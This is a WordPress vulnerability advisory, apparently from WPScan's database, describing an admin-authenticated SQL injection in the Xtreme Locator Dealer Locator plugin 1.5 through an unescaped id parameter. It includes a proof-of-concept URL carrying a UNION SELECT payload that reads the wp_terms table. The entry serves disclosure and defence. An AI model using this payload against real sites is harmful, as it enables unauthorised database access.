Xtreme Locator Dealer Locator Plugin 1.5 – Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: admins user.

$_GET[‘id’] is not escaped. Is accessible for only admins user.
Proof of Concept
1 - logged with admin user;
2 - send resquest get;

http://www.example.com/wp-admin/admin.php?page=xtreme-locator-settings&id=0+UNION+ALL+SELECT+1%2Cslug%2Cname%2C4%2C5+FROM+wp_terms+WHERE+term_id%3D1

Affects

Plugin xtremelocator

References

URL http://lenonleite.com.br/en/blog/2016/12/16/xtreme-locator-dealer-locator-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 124
Verified Yes
WPVDB ID 8704

Timeline

Publicly Published 2016-12-14 (2 months ago)
Added 2016-12-20 (2 months ago)
Last Updated 2016-12-20 (2 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.